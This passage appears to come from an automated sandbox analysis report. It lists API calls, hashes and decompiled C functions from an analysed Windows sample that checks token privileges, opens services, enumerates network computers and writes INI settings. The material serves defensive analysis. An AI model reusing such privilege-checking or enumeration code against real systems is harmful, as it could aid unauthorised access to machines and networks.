                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6F3332A1
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6F3332E9
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6F333309
                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6F33331F
                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6F333342
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6F33335B
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F333366
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1214873377-2746444292
                                                                                                                        • Opcode ID: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction ID: 08229b83593daad8b88303d06cb7f4518142c8a9b4845ba5e457421a3d9ed692
                                                                                                                        • Opcode Fuzzy Hash: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction Fuzzy Hash: 323118B2548349AFD710DB54C845FABB7E9BBC4B24F00C90DF5A587280DB75E509CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E6F3369C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
                                                                                                                        				char _v8;
                                                                                                                        				char _v11;
                                                                                                                        				char _v12;
                                                                                                                        				short _v15;
                                                                                                                        				char _v16;
                                                                                                                        				CHAR* _t19;
                                                                                                                        				CHAR* _t21;
                                                                                                                        				CHAR* _t22;
                                                                                                                        				CHAR* _t24;
                                                                                                                        				signed char _t26;
                                                                                                                        				signed int _t27;
                                                                                                                        				CHAR* _t30;
                                                                                                                        				int _t31;
                                                                                                                        				CHAR* _t35;
                                                                                                                        				CHAR* _t39;
                                                                                                                        				CHAR* _t40;
                                                                                                                        				CHAR* _t43;
                                                                                                                        				CHAR* _t46;
                                                                                                                        				CHAR* _t48;
                                                                                                                        
                                                                                                                        				_t19 = M6F3404CC; // 0xa32d38
                                                                                                                        				_t40 = M6F3404DC; // 0xa55ca8
                                                                                                                        				_t46 = _a4;
                                                                                                                        				_v16 = 0x6e6468;
                                                                                                                        				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
                                                                                                                        				_t21 = M6F3404CC; // 0xa32d38
                                                                                                                        				_t22 = M6F3404DC; // 0xa55ca8
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				_t35 =  ~_t46 & _a8;
                                                                                                                        				_v15 = 0x70;
                                                                                                                        				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21); // executed
                                                                                                                        				_t24 = M6F3404CC; // 0xa32d38
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t48 =  ~_t46 &  &_v12;
                                                                                                                        				_t43 = M6F3404DC; // 0xa55ca8
                                                                                                                        				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
                                                                                                                        				_v11 = 0;
                                                                                                                        				_v15 = 0x73;
                                                                                                                        				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24); // executed
                                                                                                                        				_t26 = _a16;
                                                                                                                        				_v15 = 0x74;
                                                                                                                        				_t27 = _t26 & 0x000000ff;
                                                                                                                        				if(_t26 == 0) {
                                                                                                                        					_t27 = 0xc;
                                                                                                                        				}
                                                                                                                        				wsprintfA( &_v12, "%d", _t27);
                                                                                                                        				_t39 = M6F3404CC; // 0xa32d38
                                                                                                                        				_t30 = M6F3404DC; // 0xa55ca8
                                                                                                                        				_t31 = WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39); // executed
                                                                                                                        				return _t31;
                                                                                                                        			}






















                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F3369EA
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,00A32D38,?,00A32D38), ref: 6F336A0D
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336A45
                                                                                                                        • wsprintfA.USER32 ref: 6F336A69
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                                        • String ID: hdn$s$t
                                                                                                                        • API String ID: 2965074233-1328931711
                                                                                                                        • Opcode ID: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction ID: 9e41e9caa8fadecac9bba49ffb96c8628ed8ed4e22ab71a04489e46710e73c76
                                                                                                                        • Opcode Fuzzy Hash: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction Fuzzy Hash: C62183B22186929FD700DF58C844E6BB7EDEFD5214F058A0CF49493241D674AA1CCBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(0054B9C9,0054BA49,0054B9C9,00000014,005445B6,00000000,00000FA0,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840), ref: 00542E71
                                                                                                                        • TlsGetValue.KERNEL32(00000005,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E88
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E9D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                                        • RtlEncodePointer.NTDLL(005343D6,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542EC6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$AddressEncodeHandleModulePointerProc
                                                                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                        • API String ID: 3030820695-3682587211
                                                                                                                        • Opcode ID: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                                        • Instruction ID: c32475e9bb3011c43e3d726bfe0c4be720bbed855a4fa3e209220d96b0486d0c
                                                                                                                        • Opcode Fuzzy Hash: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                                        • Instruction Fuzzy Hash: 6FF090305006239B8B21AB26DC049FB3EACBF05369F948521F818E32B4DB30DD528E61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __sopen_s
                                                                                                                        • String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                                                                                                        • API String ID: 2693426323-1656882147
                                                                                                                        • Opcode ID: c955d2a49e52624743202981dae0fee359524b91ec3472679bd1332280690614
                                                                                                                        • Instruction ID: 702510e495a5f5bcef536d03d161e1d4473855560d6e63228f09bd41f4b00816
                                                                                                                        • Opcode Fuzzy Hash: c955d2a49e52624743202981dae0fee359524b91ec3472679bd1332280690614
                                                                                                                        • Instruction Fuzzy Hash: F271EEB1C04209EEDB288F5984493FD7FA8BF1431CF64C42AEC5AA7191EF788A559F04
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BB07E
                                                                                                                        • _memset.LIBCMT ref: 004BB09B
                                                                                                                        • gethostname.WS2_32(00000000,00000100), ref: 004BB0AC
                                                                                                                        • gethostbyname.WS2_32(00000000), ref: 004BB0BE
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A32EF: __EH_prolog3.LIBCMT ref: 004A32F6
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 004BB138
                                                                                                                        Strings
                                                                                                                        • GetHostIP: gethostname failed: , xrefs: 004BB1B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteEnterInitializeLeave_memsetgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: GetHostIP: gethostname failed:
                                                                                                                        • API String ID: 3857270832-1828764501
                                                                                                                        • Opcode ID: cad11669c8fd95806aecbcab5cc602f3a6a5a21084eae9d589220352f58aea40
                                                                                                                        • Instruction ID: 349d24c978153597acb0d294641d772a813f79802d0ed2e9a0d1a9c9ba429b22
                                                                                                                        • Opcode Fuzzy Hash: cad11669c8fd95806aecbcab5cc602f3a6a5a21084eae9d589220352f58aea40
                                                                                                                        • Instruction Fuzzy Hash: 6251A171C00148AFDB10EFA8C856AEDBBB4AF65304F14415EE052AB291EBB85B08C7A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050C180
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        • _memset.LIBCMT ref: 0050C1EF
                                                                                                                          • Part of subcall function 0050BFDE: __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                                          • Part of subcall function 0050BFDE: WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                                          • Part of subcall function 0050BFDE: SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                                          • Part of subcall function 0050BFDE: WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                                          • Part of subcall function 0050BFDE: WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004E19D6: __EH_prolog3.LIBCMT ref: 004E19DD
                                                                                                                          • Part of subcall function 004E019F: __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                                          • Part of subcall function 004DE5E2: __EH_prolog3.LIBCMT ref: 004DE5E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalEnumH_prolog3_catchSection$Initialize$CloseDeleteErrorLastOpenResource_malloc_memset
                                                                                                                        • String ID: CommercialUse$EnumComputers.0$EnumComputers.1$EnumComputersThread
                                                                                                                        • API String ID: 3123197802-1530958834
                                                                                                                        • Opcode ID: c67ade20e242b273d92bbccb45b075de57fc47d6366505db761b060cc9a17596
                                                                                                                        • Instruction ID: 05e0eff4078664633abe1d444c0b6dbc70219798da1c869670169f2c63a0688f
                                                                                                                        • Opcode Fuzzy Hash: c67ade20e242b273d92bbccb45b075de57fc47d6366505db761b060cc9a17596
                                                                                                                        • Instruction Fuzzy Hash: A541E870900388AADB10EBB58956BEDBFA5BF52308F20456EE1427B2C2DB791F44C756
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA049
                                                                                                                        • CreateThread.KERNEL32 ref: 004EA071
                                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA0AA
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • ResumeThread.KERNEL32(?,0000002C,004DD255,?), ref: 004EA0CD
                                                                                                                        Strings
                                                                                                                        • Thread.Create.Failed, xrefs: 004EA088
                                                                                                                        • CreateThread, not running yet, xrefs: 004EA0B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$Thread$CreateCriticalIncrementInitializeInterlockedResumeSection
                                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                                        • API String ID: 3859527013-1474816145
                                                                                                                        • Opcode ID: 7a8d0bc91cd5e1aa6a3b15c91ec62c85d04e2f3e2a1a1d76356f4bc47ff17842
                                                                                                                        • Instruction ID: 748b0913021fcb97cc79a03ea8ed07f168fa6b075067c64e1e9f7b92f0b2e480
                                                                                                                        • Opcode Fuzzy Hash: 7a8d0bc91cd5e1aa6a3b15c91ec62c85d04e2f3e2a1a1d76356f4bc47ff17842
                                                                                                                        • Instruction Fuzzy Hash: DD110830900241ABDB30EF66DC0996E7F71FF95722F10420EF122961E0DB786901D71A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F3338A0(char* _a4, char** _a8, int _a12, signed int _a16) {
                                                                                                                        				char* _t5;
                                                                                                                        				void* _t14;
                                                                                                                        				int _t19;
                                                                                                                        				void* _t24;
                                                                                                                        				void* _t25;
                                                                                                                        				signed int _t27;
                                                                                                                        
                                                                                                                        				_t19 = 0;
                                                                                                                        				_t5 = OpenSCManagerA(0, 0, 0xf003f); // executed
                                                                                                                        				_t25 = _t5;
                                                                                                                        				if(_t25 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_t27 = _a16;
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
                                                                                                                        					if(_t24 == 0) {
                                                                                                                        						L6:
                                                                                                                        						CloseServiceHandle(_t25);
                                                                                                                        						goto L7;
                                                                                                                        					} else {
                                                                                                                        						if(_t27 != 0) {
                                                                                                                        							_t19 = 1;
                                                                                                                        							goto L6;
                                                                                                                        						} else {
                                                                                                                        							_t14 = E6F3337D0(_t24, _a8, _a12);
                                                                                                                        							CloseServiceHandle(_t24);
                                                                                                                        							CloseServiceHandle(_t25);
                                                                                                                        							return _t14;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t25 = OpenSCManagerA(_t5, _t5, 1);
                                                                                                                        					if(_t25 == 0) {
                                                                                                                        						L7:
                                                                                                                        						return _t19;
                                                                                                                        					} else {
                                                                                                                        						goto L2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.SECHOST(00000000,00000000,000F003F,00000000,00000000,00000000,6F33709F,00A55CD8,00000000,00000000,00000001,?,00000000), ref: 6F3338B2
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F3338BE
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6F3338E2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6F333908
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F33390F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F333922
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196757001-0
                                                                                                                        • Opcode ID: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction ID: 60893e5dad7e7ba502457eb07b1cbd069f2583410f47a50608a289a6c24bd7c8
                                                                                                                        • Opcode Fuzzy Hash: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction Fuzzy Hash: 4E01F9B3B05A69ABD7119A789C859BBB39DDFC5661F04012AFA40D7200DB66DC0546A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004F91FC
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • GetTickCount.KERNEL32 ref: 004F9276
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004F92BF
                                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,BlockGuardThread,00000000,0000006C), ref: 004F92FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$CloseCountDeleteHandleInitializeInternetSleepTickclosesocketshutdown
                                                                                                                        • String ID: BlockGuardThread
                                                                                                                        • API String ID: 4006895559-3235377368
                                                                                                                        • Opcode ID: 91f061a56682c373da9e5bf5c21ab94481fe2c56bedb5626e9856256ad66a46b
                                                                                                                        • Instruction ID: aebc0e39f4333073a657320902b044686f82bcc6320b268cb2b5a0bacd630e9b
                                                                                                                        • Opcode Fuzzy Hash: 91f061a56682c373da9e5bf5c21ab94481fe2c56bedb5626e9856256ad66a46b
                                                                                                                        • Instruction Fuzzy Hash: 66319C7190020DAFDB24EFA0C885BEEBBB5AF04315F10455EE6027B2D1DB796E49CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                        • CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA018
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        Strings
                                                                                                                        • Thread.Create.Failed, xrefs: 004E9FF4
                                                                                                                        • CreateThread, not running yet, xrefs: 004EA01F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalIncrementInitializeInterlockedSectionThread
                                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                                        • API String ID: 3278170271-1474816145
                                                                                                                        • Opcode ID: 9f708ba1ffea769834e1f08a032b6fea88a847d95f1b889b5fa2302948fccbc2
                                                                                                                        • Instruction ID: fa06a62da20e3ffc879d0189229f950c1cc712b5ae2b368708147620d2bae4ef
                                                                                                                        • Opcode Fuzzy Hash: 9f708ba1ffea769834e1f08a032b6fea88a847d95f1b889b5fa2302948fccbc2
                                                                                                                        • Instruction Fuzzy Hash: 0C112BB0500344BFDB24EF65CC859AE7BA4FF64351F00822EF511872D0D7746A04C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F336480() {
                                                                                                                        				intOrPtr* _v24;
                                                                                                                        				intOrPtr _v40;
                                                                                                                        				void* _v104;
                                                                                                                        				void* _v112;
                                                                                                                        				intOrPtr* _v124;
                                                                                                                        				char _v128;
                                                                                                                        				char* _v132;
                                                                                                                        				char _v136;
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				intOrPtr* _v144;
                                                                                                                        				char _v148;
                                                                                                                        				intOrPtr* _v152;
                                                                                                                        				intOrPtr* _v160;
                                                                                                                        				void* _v164;
                                                                                                                        				intOrPtr _v168;
                                                                                                                        				intOrPtr* _v180;
                                                                                                                        				void* _v184;
                                                                                                                        				char _v192;
                                                                                                                        				short _v196;
                                                                                                                        				char _v200;
                                                                                                                        				intOrPtr* _v208;
                                                                                                                        				intOrPtr _v224;
                                                                                                                        				intOrPtr* _v236;
                                                                                                                        				intOrPtr* _v244;
                                                                                                                        				intOrPtr* _v256;
                                                                                                                        				intOrPtr* _v264;
                                                                                                                        				intOrPtr* _v276;
                                                                                                                        				char* _t66;
                                                                                                                        				intOrPtr* _t68;
                                                                                                                        				void* _t70;
                                                                                                                        				intOrPtr* _t71;
                                                                                                                        				intOrPtr* _t73;
                                                                                                                        				intOrPtr* _t76;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				intOrPtr* _t81;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				void* _t85;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				void* _t88;
                                                                                                                        				intOrPtr* _t89;
                                                                                                                        				intOrPtr* _t91;
                                                                                                                        				void* _t93;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				intOrPtr* _t98;
                                                                                                                        				intOrPtr* _t101;
                                                                                                                        				intOrPtr* _t103;
                                                                                                                        				intOrPtr* _t105;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				void* _t110;
                                                                                                                        				intOrPtr* _t111;
                                                                                                                        				void* _t113;
                                                                                                                        				intOrPtr* _t114;
                                                                                                                        				intOrPtr* _t116;
                                                                                                                        				short _t164;
                                                                                                                        
                                                                                                                        				_t164 = 0;
                                                                                                                        				__imp__CoInitializeEx(0, 0);
                                                                                                                        				_t66 =  &_v104;
                                                                                                                        				_v104 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33db8c, 0, 1, 0x6f33ddac, _t66); // executed
                                                                                                                        				if(_t66 < 0) {
                                                                                                                        					L19:
                                                                                                                        					__imp__CoUninitialize();
                                                                                                                        					return _t164;
                                                                                                                        				}
                                                                                                                        				_t68 = _v124;
                                                                                                                        				_v112 = 0;
                                                                                                                        				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))(_t68,  *_v24, 0, 2,  &_v112); // executed
                                                                                                                        				if(_t70 < 0) {
                                                                                                                        					L18:
                                                                                                                        					_t71 = _v144;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_t73 = _v144;
                                                                                                                        				_v136 = 0;
                                                                                                                        				_push( &_v136);
                                                                                                                        				_push(_t73);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
                                                                                                                        					L17:
                                                                                                                        					_t76 = _v140;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76); // executed
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t78 = _v144;
                                                                                                                        				_push(_v40);
                                                                                                                        				_push(_t78);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
                                                                                                                        					L16:
                                                                                                                        					_t81 = _v152;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
                                                                                                                        					goto L17;
                                                                                                                        				}
                                                                                                                        				asm("movq xmm0, [0x6f33db9c]");
                                                                                                                        				_t83 = _v160;
                                                                                                                        				asm("movq [esp+0x30], xmm0");
                                                                                                                        				asm("movq xmm0, [0x6f33dba4]");
                                                                                                                        				_v164 = 0;
